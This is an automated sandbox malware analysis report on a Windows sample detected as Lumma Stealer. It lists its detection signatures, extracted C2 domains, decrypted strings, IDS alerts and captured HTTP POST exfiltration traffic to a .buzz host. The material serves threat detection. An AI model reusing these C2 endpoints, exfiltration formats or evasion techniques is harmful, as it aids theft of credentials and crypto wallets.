Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fer4JIJGeL.exe

Overview

General Information

Sample name:fer4JIJGeL.exe
renamed because original name is a hash value
Original sample name:0d3b04489baa22c2f702c549466b64f4.exe
Analysis ID:1581241
MD5:0d3b04489baa22c2f702c549466b64f4
SHA1:9f7abb36d9fffd4d6cb236c8e119359517691729
SHA256:0da0539837800ea38bae7556cd5ffe4d45fb0d1135253e85801645bc7fa6cfec
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • fer4JIJGeL.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\fer4JIJGeL.exe" MD5: 0D3B04489BAA22C2F702C549466B64F4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "scentniej.buzz", "hummskitnj.buzz", "screwamusresz.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 6 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:00:16.122859+010020283713Unknown Traffic192.168.2.849705172.67.165.185443TCP
                2024-12-27T09:00:18.065792+010020283713Unknown Traffic192.168.2.849706172.67.165.185443TCP
                2024-12-27T09:00:20.802751+010020283713Unknown Traffic192.168.2.849707172.67.165.185443TCP
                2024-12-27T09:00:23.053569+010020283713Unknown Traffic192.168.2.849708172.67.165.185443TCP
                2024-12-27T09:00:25.371174+010020283713Unknown Traffic192.168.2.849709172.67.165.185443TCP
                2024-12-27T09:00:27.986135+010020283713Unknown Traffic192.168.2.849710172.67.165.185443TCP
                2024-12-27T09:00:31.192538+010020283713Unknown Traffic192.168.2.849711172.67.165.185443TCP
                2024-12-27T09:00:34.719114+010020283713Unknown Traffic192.168.2.849715172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:00:16.843983+010020546531A Network Trojan was detected192.168.2.849705172.67.165.185443TCP
                2024-12-27T09:00:19.055605+010020546531A Network Trojan was detected192.168.2.849706172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:00:16.843983+010020498361A Network Trojan was detected192.168.2.849705172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:00:19.055605+010020498121A Network Trojan was detected192.168.2.849706172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:00:21.686754+010020480941Malware Command and Control Activity Detected192.168.2.849707172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:00:31.197541+010028438641A Network Trojan was detected192.168.2.849711172.67.165.185443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: fer4JIJGeL.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://mindhandru.buzz/kuAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/4Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/~ZAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/pilAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apisZVAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/WinAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apillAvira URL Cloud: Label: malware
                Found malware configuration
                Source: fer4JIJGeL.exe.7656.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "scentniej.buzz", "hummskitnj.buzz", "screwamusresz.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: fer4JIJGeL.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: fer4JIJGeL.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: fer4JIJGeL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49707 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49711 -> 172.67.165.185:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AVT6GUCXUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12792Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3PQAHZZ6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15015Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5T8PG350TZ5RDHECV6FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20248Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LK7TWOIGHFY18V46CV8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1241Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0WACV1U001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551961Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: fer4JIJGeL.exe, 00000000.00000003.1537765553.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538148540.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608248734.000000000187E000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.0000000001871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro8
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488788404.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.0000000001812000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488770291.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488938097.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.000000000180B000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488678588.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/4
                Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/Win
                Source: fer4JIJGeL.exe, 00000000.00000003.1569841821.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621827574.000000000182C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619487508.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537869604.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619202286.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621698002.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621848347.000000000184D000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001829000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1583937093.0000000001887000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569841821.0000000001829000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608270681.000000000182C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537765553.0000000001829000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.0000000001887000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608570029.000000000184C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apill
                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608570029.000000000184C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apisZV
                Source: fer4JIJGeL.exe, 00000000.00000003.1569841821.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/d
